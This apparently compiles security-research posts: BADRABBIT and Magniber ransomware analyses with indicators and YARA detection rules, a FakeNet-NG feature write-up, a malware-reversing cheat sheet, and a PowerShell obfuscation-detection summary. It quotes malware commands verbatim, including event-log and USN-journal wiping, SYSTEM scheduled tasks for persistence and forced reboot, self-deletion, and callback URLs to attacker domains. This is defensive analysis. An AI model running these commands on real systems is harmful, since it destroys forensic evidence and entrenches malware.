The malware writes its ransom message to the root of each affected drive with the filename Readme.txt.

infpub.dat is capable of performing lateral movement via WMI or SMB. Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network. The malware contains lists of common usernames, passwords, and named pipes that it can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system, file encryption is not performed. If the malware is executed with the “-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader. If one of three McAfee antivirus processes is running on the system, dispci.exe is written to the %ALLUSERSPROFILE% directory; otherwise, it is written to C:\Windows. The sample is executed on system start using a scheduled task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32- or 64-bit DiskCryptor driver named cscc.dat facilitates disk encryption. It is installed in the C:\Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32- or 64-bit Mimikatz variant is written to a temporary file (e.g., 651D.tmp) in the C:\Windows directory and executed by passing a named pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as an argument. Harvested credentials are passed back to infpub.dat via the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

infpub.dat contains a checksum algorithm like the one used in EternalPetya. However, the initial checksum value differs slightly: 0x87654321 in infpub.dat versus 0x12345678 in EternalPetya. infpub.dat also supports the same command line arguments as EternalPetya, with the addition of the "-f" argument, which bypasses the malware's credential theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists on the system and will exit if found. The file in this case is cscc.dat. infpub.dat contains a wmic.exe lateral movement capability, but unlike EternalPetya, does not contain a PSEXEC binary used to perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections


Detection Names


malware.binary.exe, Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING


BADRABBIT RANSOMWARE (FAMILY), Gen:Heur.Ransom.BadRabbit.1, Gen:Variant.Ransom.BadRabbit.1


WINDOWS METHODOLOGY [Scheduled Task Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS METHODOLOGY [Audit Log Cleared], WINDOWS METHODOLOGY [Rundll32 Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log], WINDOWS METHODOLOGY [Fsutil USN Deletejournal], WINDOWS METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with research for this blog.


File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit DiskCryptor driver

File: <rand_4_hex>.tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: \system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note that “15” is the default value present in the malware and may be altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id <rand_task_id> && exit"
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST <HH:MM:00>
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D <current_drive_letter>:
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id <rand_task_id> && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
other user
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)

Yara Rules

rule FE_Hunting_BADRABBIT {
    meta:
        author = "ian.ahl @TekDefense & nicholas.carr @itsreallynick"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
    strings:
        // Messages
        $msg1 = "Incorrect password" nocase ascii wide
        $msg2 = "Oops! Your files have been encrypted." ascii wide
        $msg3 = "If you see this text, your files are no longer accessible." ascii wide
        $msg4 = "You might have been looking for a way to recover your files." ascii wide
        $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
        $msg6 = "Visit our web service at" ascii wide
        $msg7 = "Your personal installation key#1:" ascii wide
        $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
        $msg9 = "Password#1" nocase ascii wide
        $msg10 = "caforssztxqzf2nm.onion" nocase ascii wide
        $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

        // File references
        $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
        $fref2 = "\\\\.\\dcrypt" nocase ascii wide
        $fref3 = "Readme.txt" ascii wide
        $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii wide
        $fref5 = "dispci.exe" nocase ascii wide
        $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide

        // META
        $meta1 = "" nocase ascii wide // value lost from this copy of the post
        $meta2 = "dispci.exe" nocase ascii wide
        $meta3 = "GrayWorm" ascii wide
        $meta4 = "viserion" nocase ascii wide

        // Commands
        $com1 = "ComSpec" ascii wide
        $com2 = "\\cmd.exe" nocase ascii wide
        $com3 = "schtasks /Create" nocase ascii wide
        $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
    condition:
        (uint16(0) == 0x5A4D) and
        (
            (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*)) or
            (all of ($meta*) and 8 of ($msg*))
        )
}

// Rule name reconstructed; the original name was lost from this copy of the post.
rule FE_BADRABBIT_DROPPER {
    meta:
        author = "muhammad.umair"
        md5 = "fbbdc39af1139aebba4da004475e8839"
        rev = 1
    strings:
        $api1 = "GetSystemDirectoryW" fullword
        $api2 = "GetModuleFileNameW" fullword
        $dropped_dll = "infpub.dat" ascii fullword wide
        $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
        $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name reconstructed; the original name was lost from this copy of the post.
rule FE_BADRABBIT_RANSOMWARE {
    meta:
        author = "muhammad.umair"
        md5 = "1d724f95c61f1055f0d02c2154bbccd3"
        rev = 1
    strings:
        $api1 = "WNetAddConnection2W" fullword
        $api2 = "CredEnumerateW" fullword
        $api3 = "DuplicateTokenEx" fullword
        $api4 = "GetIpNetTable"
        $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
        $dropped_driver = "cscc.dat" ascii fullword wide
        $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
        $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
        $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name reconstructed; the original name was lost from this copy of the post.
rule FE_BADRABBIT_MIMIKATZ {
    meta:
        author = "muhammad.umair"
        md5 = "37945c44a897aa42a66adcab68f560e0"
        rev = 1
    strings:
        $api1 = "WriteProcessMemory" fullword
        $api2 = "SetSecurityDescriptorDacl" fullword
        $api_str1 = "BCryptDecrypt" ascii fullword wide
        $mimi_str = "CredentialKeys" ascii fullword wide
        $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name reconstructed; the original name was lost from this copy of the post.
rule FE_BADRABBIT_DISKENCRYPTOR {
    meta:
        author = "muhammad.umair"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
        rev = 1
    strings:
        $api1 = "CryptAcquireContextW" fullword
        $api2 = "CryptEncrypt" fullword
        $api3 = "NetWkstaGetInfo" fullword
        $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
        $msg1 = "Disk decryption progress..." ascii fullword wide
        $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
        $tok1 = "\\\\.\\dcrypt" ascii fullword wide
        $tok2 = "C:\\Windows\\cscc.dat" ascii fullword wide
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them
}

New FakeNet-NG Feature: Content-Based Protocol Detection

I (Matthew Haigh) recently contributed to FLARE’s FakeNet-NG network simulator by adding content-based protocol detection and configuration. This feature is useful for analyzing malware that uses a protocol over a non-standard port; for example, HTTP over port 81. The new feature also detects and adapts to SSL, so that any protocol can be used with SSL and handled appropriately by FakeNet-NG. We were motivated to add this feature because the original FakeNet supported it and we encountered real-world malware that required it.

What is FakeNet-NG

FakeNet-NG simulates a network so malware analysts can run samples with network functionality without the risks of an Internet connection. Analysts can examine network-based indicators via FakeNet-NG’s textual and pcap output. It is plug-and-play, configurable, and works on both Windows and Linux. FakeNet-NG simulates common protocols to trick malware into thinking it is connected to the Internet. FakeNet-NG supports the following protocols: DNS, HTTP, FTP, POP, SMTP, IRC, SSL, and TFTP.

Previous Design

Previously FakeNet-NG employed Listener modules, which were bound to configurable ports for each protocol. Any traffic on those ports was received by the socket and processed by the Listener. 

In the previous architecture, packets were redirected using a Diverter module that utilized WinDivert for Windows and netfilter for Linux. Each incoming and outgoing packet was examined by the Diverter, which kept a running list of connections. Packets destined for outbound ports were redirected to a default Listener, which would respond to any packet with an echo of the same data. The Diverter also redirected packets based on whether FakeNet-NG was run in Single-Host or Multi-Host mode, and if any applications were blacklisted or whitelisted according to the configuration. It would simply release the packet on the appropriate port and the intended Listener would receive it on the socket.

New Design

My challenge was to eliminate this port/protocol dependency. In order to disassociate the Listeners from the corresponding ports, a new architecture was needed. The first challenge was to maintain Listener functionality. The original architecture relied on Python libraries that interact with the socket. Therefore, we needed to maintain “socket autonomy” in the Listener, so we added a “taste()” function for each Listener. The routine returns a confidence score based on the likelihood that the packet is associated with the protocol. Figure 1 demonstrates the taste() routine for HTTP, which looks for the request method string at the beginning of the packet data. It gives an additional point if the packet is on a common HTTP port. There were several choices for how these scores were to be tabulated. It could not happen in the Diverter because of the TCP handshake. The Diverter could not sample data from data-less handshake packets, and if the Diverter completed the handshake, the connection could not easily be passed to a different socket at the Listener without disrupting the connection.

Figure 1: HTTP taste() example
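As a rough illustration of the idea (not FakeNet-NG's actual code; the method list, port list, and score values below are invented), an HTTP taste() heuristic along the lines described might look like this:

```python
# Hypothetical sketch of a taste() scoring heuristic, modeled on the description
# above; the constants and weights are illustrative assumptions.
HTTP_METHODS = (b'GET ', b'HEAD ', b'POST ', b'PUT ', b'DELETE ', b'OPTIONS ')
HTTP_PORTS = (80, 81, 8000, 8080)

def taste(data, dport):
    """Return a confidence score that `data` is the start of an HTTP request."""
    score = 0
    if data.startswith(HTTP_METHODS):   # request line begins with an HTTP method
        score += 2
    if dport in HTTP_PORTS:             # extra point for a common HTTP port
        score += 1
    return score
```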


We ultimately decided to add a proxy Listener that maintains full-duplex connections with the client and the Listener, with both sides unaware of the other. This solves the handshake problem and maintains socket autonomy at the Listener. The proxy is also easily configurable and enables new functionality. We substituted the proxy for the echo-server default Listener, which would receive traffic destined for unbound ports. The proxy peeks at the data on the socket, polls the Listeners, and creates a new connection with the Listener that returns the highest score. The echo-server always returns a score of one, so it will be chosen if no better option is detected.

The analyst controls which Listeners are bound to ports and which Listeners are polled by the proxy. This means that the Listeners do not have to be exposed at all; everything can be decided by the proxy. The user can set the Hidden option in the configuration file to False to ensure the Listener will be bound to the port indicated in the configuration file. Setting Hidden to True will force any packets to go through the proxy before accessing the Listener. For example, if the analyst suspects that malware is using FTP on port 80, she can ‘hide’ HTTP from catching the traffic, and let the proxy detect FTP and forward the packet to the FTP Listener. Additional configuration options exist for choosing which protocols are polled by the proxy. See Figure 2 and Figure 3 for configuration examples. Figure 2 is a basic configuration for a Listener, and Figure 3 demonstrates how the proxy is configurable for TCP and UDP.
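The peek-poll-select flow can be sketched as follows (a simplified stand-in for the real proxy; the listener objects here are hypothetical, not FakeNet-NG classes):

```python
import socket

# Simplified stand-in for the proxy's listener-selection logic described above.
class EchoListener:
    """Default echo server: always scores 1, so it wins only when nothing else does."""
    name = 'echo'
    def taste(self, data, dport):
        return 1

def peek(sock, n=2048):
    # Inspect pending data without consuming it, so the chosen listener can
    # still read the full stream once the proxy connects to it.
    return sock.recv(n, socket.MSG_PEEK)

def pick_listener(listeners, data, dport):
    """Poll each candidate listener's taste() and return the highest scorer."""
    return max(listeners, key=lambda listener: listener.taste(data, dport))
```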

Figure 2: Listener Configuration Options

Figure 3: Proxy Configuration Options

The proxy also handles SSL detection. Before polling the Listeners, the proxy examines the packet. If SSL is detected, the proxy “wraps” the socket in SSL using Python’s OpenSSL library. With the combination of protocol and SSL detection, each independent of the other, FakeNet-NG can now handle just about any protocol combination.
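The detection step can be approximated with a simple record-header check (an assumption for illustration, not FakeNet-NG's actual implementation):

```python
# Assumption-level sketch: recognize a likely SSL/TLS ClientHello from the
# first bytes of a connection before any listener is chosen.
def looks_like_tls(data):
    """TLS records begin with content type 0x16 (handshake) and version 0x03.xx."""
    return len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03

# On a hit, a proxy could then wrap the accepted socket, e.g. with
# ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER).wrap_socket(sock, server_side=True),
# so the inner protocol can be scored on the decrypted stream.
```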

The proxied SSL implementation also allows for improved packet analysis. The connection between the proxy and the Listener is not encrypted, which allows FakeNet to dump unencrypted packets to the pcap output. This makes it easier for the analyst to examine the packet data. FakeNet continues to produce pcap output that includes packet data before and after modification by FakeNet. While this results in repetitive data, it is often useful to see the original packet along with the modification.


Figure 4 shows verbose (-v) output from FakeNet on Windows responding to an HTTP request on port 81 from a clowncar malware variant (SHA-256 8d2dfd609bcbc94ff28116a80cf680660188ae162fc46821e65c10382a0b44dc). Malware such as clowncar use traditional protocols over non-standard ports for many reasons. FakeNet gives the malware analyst the flexibility to detect and respond to these cases automatically.

Figure 4: clowncar malware using HTTP on port 81


FLARE’s FakeNet-NG tool is a powerful network-simulation tool available for Windows and Linux. The new content-based protocol detection and SSL detection features ensure that FakeNet-NG remains the most useful tool for malware analysts. Configuration options give programmers the flexibility necessary to respond to malware using most protocols on any port.

Magniber Ransomware Wants to Infect Only the Right People


Exploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.

In Figure 1, which is based on FireEye Dynamic Threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.

Figure 1: Magnitude EK distribution as seen in March 2017

This trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large chunk targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline in Cerber distributed via email), and it is now distributing ransomware known as Magniber.


The first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain: fastprofit[.]loan. The infection chain is shown in Figure 2.

Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched. Figure 3 shows the landing page and CVE usage.

Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4) and domain infrastructure is hosted on the following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”

Figure 4: Magnitude payload header and plain MZ response


In the initial report published by our colleagues at Trend Micro, the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won’t execute if the system language is not Korean.

Magniber encrypts user data using AES128. The sample used for this analysis (dc2a2b84da359881b9df1ec31d03c715) was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publicly by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.

The malware contains a binary payload in its resource section, encrypted in reverse using RC4: unpacking starts at the end of the buffer and proceeds toward its start. The reverse RC4 decryption key is 30 bytes long and contains non-ASCII characters. It is as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits (instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.

Figure 5: Language check targeted at Korea

A mutex with name "ihsdj" is created to prevent multiple executions. The payload then generates a pseudorandom 19-character string based on the CPU clock from multiple GetTickCount calls. The string is then used to create a file in the user’s %TEMP% directory (e.g. "xxxxxxxxxxxxxxxxxxx.ihsdj"), which contains the IV (Initialization Vector) for the AES128 encryption and a copy of the malware itself with the name "ihsdj.exe".

Next, the malware constructs four URLs for callback. It uses the 19-character pseudorandom string it generated and the following domains to create the URLs:


In order to evade sandbox systems, the malware checks whether it is running inside a VM and appends the result to the callback URL. It does this by executing CPUID instructions (shown in Figure 6) sandwiched between RDTSC calls, forcing a VM exit.

Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is performed multiple times to gather the average execution time of the CPUID instruction; if the average execution time is greater than 1000, the malware considers the system to be a VM. If it concludes the system is a VM, a "1" is appended to the end of the URL (see Figure 7); otherwise, a "0" is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0
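The URL construction above can be sketched in Python. Note the assumptions: the real malware derives its 19 characters from GetTickCount, while a generic PRNG and a lowercase-alphanumeric alphabet are substituted here purely for demonstration.

```python
import random
import string

# Illustrative reconstruction of the Magniber callback URL format described
# above; the subdomain generator is a stand-in, not the malware's algorithm.
def make_callback_url(domain, is_vm, rerun=False, rng=random):
    subdomain = ''.join(rng.choice(string.ascii_lowercase + string.digits)
                        for _ in range(19))
    stage = 'end' if rerun else 'new'   # "end" on the post-encryption rerun
    return 'http://{0}.{1}/{2}{3}'.format(subdomain, domain, stage, int(is_vm))
```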

Figure 7: Command and control communication

If the malware is executed a second time after encryption, the callback URL ends in "end0" or "end1" instead of "new". An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system, renaming them by adding a ".ihsdj" extension to the end. The AES128 Key and IV for the sample analyzed are listed:

  • IV: EP866p5M93wDS513
  • AES128 Key: S25943n9Gt099y4K

A text file "READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt" is created in the user’s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.

Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP% via the Program Compatibility Assistant (pcalua.exe) and to display the ransom note:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a %TEMP%\ihsdj.exe"
  • schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting, using a local ping to delay the deletion:

  • cmd /c ping localhost -n 3 > nul & del C:\PATH\MALWARE.EXE

Figure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.

Figure 9: Python script for unpacking malware payload
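A reverse-RC4 unpacker along the lines described can be sketched as follows. The reversal convention (standard RC4 run over the reversed bytes) is inferred from the write-up, and the key in the test is a placeholder, not the real 30-byte key listed earlier.

```python
# Sketch of a reverse-RC4 unpacker matching the behavior described earlier:
# the resource payload is decrypted from the end of the buffer toward the start.
def rc4(key, data):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def unpack_reversed(key, blob):
    """Decrypt a buffer that was RC4-encrypted back to front."""
    return rc4(key, blob[::-1])[::-1]
```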


Ransomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk – especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye NX blocks delivery at the infection point.


Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malvertising Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement your understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments and labels; rename functions and variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS Segment register; FS:[0] points to the SEH chain, FS:[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX.
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+0x14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE / JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile
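A quick triage pass for the API names above can be as simple as string-scanning the binary. This is a rough heuristic sketch, not a substitute for parsing the PE import table; a raw scan misses dynamically resolved or packed names, so treat hits only as leads.

```python
# Quick-triage sketch: flag risky API names appearing verbatim in a binary blob.
RISKY_APIS = [
    b'CreateRemoteThread', b'WriteProcessMemory', b'VirtualAllocEx',
    b'SetWindowsHookEx', b'GetAsyncKeyState', b'GetClipboardData',
    b'LoadLibrary', b'GetProcAddress', b'CreateProcess', b'InternetOpen',
]

def find_risky_apis(blob):
    """Return the risky API names that appear in the byte blob, sorted."""
    return sorted(name.decode() for name in RISKY_APIS if name in blob)
```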

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from one “interesting” code block to another.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science

Many attackers continue to leverage PowerShell as a part of their malware ecosystem, mostly delivered and executed by malicious binaries and documents. Of malware that uses PowerShell, the most prevalent use is the garden-variety stager: an executable or document macro that launches PowerShell to download another executable and run it. There has been significant development and innovation in the field of offensive PowerShell techniques. While defenders and products have implemented greater PowerShell visibility and improved detection, the offensive PowerShell community has adapted their tools to avoid signature-based detections. Part of this response has come through an increased use of content obfuscation – a technique long employed at both the binary and content level by traditional malware authors.

In our Revoke-Obfuscation white paper, first presented at Black Hat USA 2017, we provide background on obfuscated PowerShell attacks seen in the wild, as well as defensive mitigation and logging best practices. We then make the case for the inefficiencies of static detection by exploring the many layers of obfuscation now available to attackers for launching PowerShell scripts, shortening and complicating commands contained within the scripts, manipulating strings, and using alternate and obscure methods to evade defenders. We then present a number of unique approaches for interpreting, categorizing, and processing obfuscated PowerShell attributes in order to build a framework for high fidelity obfuscation detection. To support our research, we collected an unprecedented PowerShell data corpus comprised of 408,000 scripts – including 7,000 manually-reviewed and labeled scripts – from a vast set of sources, both public and previously unavailable. In addition to releasing the PowerShell data corpus, we have released the Revoke-Obfuscation framework, which has been used in numerous Mandiant investigations, to assist the security community in classifying PowerShell scripts’ obfuscation at scale.

Download the Revoke-Obfuscation white paper today, and also check out our presentation from Black Hat USA 2017.

Revoke-Obfuscation is the result of industry research collaboration between Daniel Bohannon (@danielhbohannon), Senior Applied Security Researcher at Mandiant/FireEye, and Lee Holmes (@Lee_Holmes), Lead Security Architect of Azure Management at Microsoft.

